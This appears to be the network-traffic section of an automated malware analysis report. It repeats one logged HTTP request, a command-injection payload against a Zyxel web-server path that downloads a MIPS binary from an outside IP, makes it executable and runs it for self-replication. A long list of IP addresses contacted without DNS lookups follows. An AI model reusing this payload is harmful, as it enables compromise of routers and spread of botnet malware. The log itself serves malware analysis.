            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: unknownTCP traffic detected without corresponding DNS query: 47.168.129.149
            Source: unknownTCP traffic detected without corresponding DNS query: 98.161.82.110
            Source: unknownTCP traffic detected without corresponding DNS query: 217.32.205.138
            Source: unknownTCP traffic detected without corresponding DNS query: 123.67.14.39
            Source: unknownTCP traffic detected without corresponding DNS query: 41.47.130.56
            Source: unknownTCP traffic detected without corresponding DNS query: 197.248.6.28
            Source: unknownTCP traffic detected without corresponding DNS query: 41.88.166.218
            Source: unknownTCP traffic detected without corresponding DNS query: 181.39.43.36
            Source: unknownTCP traffic detected without corresponding DNS query: 41.212.123.22
            Source: unknownTCP traffic detected without corresponding DNS query: 157.80.114.38
            Source: unknownTCP traffic detected without corresponding DNS query: 41.191.40.28
            Source: unknownTCP traffic detected without corresponding DNS query: 197.146.224.22
            Source: unknownTCP traffic detected without corresponding DNS query: 112.226.236.99
            Source: unknownTCP traffic detected without corresponding DNS query: 209.18.133.191
            Source: unknownTCP traffic detected without corresponding DNS query: 157.183.245.29
            Source: unknownTCP traffic detected without corresponding DNS query: 157.14.247.253
            Source: unknownTCP traffic detected without corresponding DNS query: 41.227.70.135
            Source: unknownTCP traffic detected without corresponding DNS query: 136.247.165.7
            Source: unknownTCP traffic detected without corresponding DNS query: 68.83.39.204
            Source: unknownTCP traffic detected without corresponding DNS query: 197.115.230.153
            Source: unknownTCP traffic detected without corresponding DNS query: 2.154.130.18
            Source: unknownTCP traffic detected without corresponding DNS query: 157.247.118.250
            Source: unknownTCP traffic detected without corresponding DNS query: 41.137.97.3
            Source: unknownTCP traffic detected without corresponding DNS query: 39.200.232.210
            Source: unknownTCP traffic detected without corresponding DNS query: 130.39.209.242
            Source: unknownTCP traffic detected without corresponding DNS query: 197.139.29.53
            Source: unknownTCP traffic detected without corresponding DNS query: 41.0.101.189
            Source: unknownTCP traffic detected without corresponding DNS query: 54.161.89.135
            Source: unknownTCP traffic detected without corresponding DNS query: 197.40.56.216
            Source: unknownTCP traffic detected without corresponding DNS query: 41.228.217.83
            Source: unknownTCP traffic detected without corresponding DNS query: 197.219.115.242
            Source: unknownTCP traffic detected without corresponding DNS query: 197.155.49.76
            Source: unknownTCP traffic detected without corresponding DNS query: 197.188.101.181
            Source: unknownTCP traffic detected without corresponding DNS query: 41.66.133.249
            Source: unknownTCP traffic detected without corresponding DNS query: 157.46.138.157
            Source: unknownTCP traffic detected without corresponding DNS query: 192.176.244.62
            Source: unknownTCP traffic detected without corresponding DNS query: 113.39.145.167
            Source: unknownTCP traffic detected without corresponding DNS query: 41.255.86.222
            Source: unknownTCP traffic detected without corresponding DNS query: 41.91.81.125
            Source: unknownTCP traffic detected without corresponding DNS query: 86.165.31.182
            Source: unknownTCP traffic detected without corresponding DNS query: 157.160.108.6
            Source: unknownTCP traffic detected without corresponding DNS query: 157.116.206.137
            Source: unknownTCP traffic detected without corresponding DNS query: 130.206.212.121
            Source: unknownTCP traffic detected without corresponding DNS query: 197.113.115.21
            Source: unknownTCP traffic detected without corresponding DNS query: 157.81.241.81
            Source: unknownTCP traffic detected without corresponding DNS query: 219.44.221.247
            Source: unknownTCP traffic detected without corresponding DNS query: 197.249.50.153
            Source: unknownTCP traffic detected without corresponding DNS query: 157.126.119.55
            Source: unknownTCP traffic detected without corresponding DNS query: 157.177.96.214
            Source: unknownTCP traffic detected without corresponding DNS query: 41.104.83.137
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
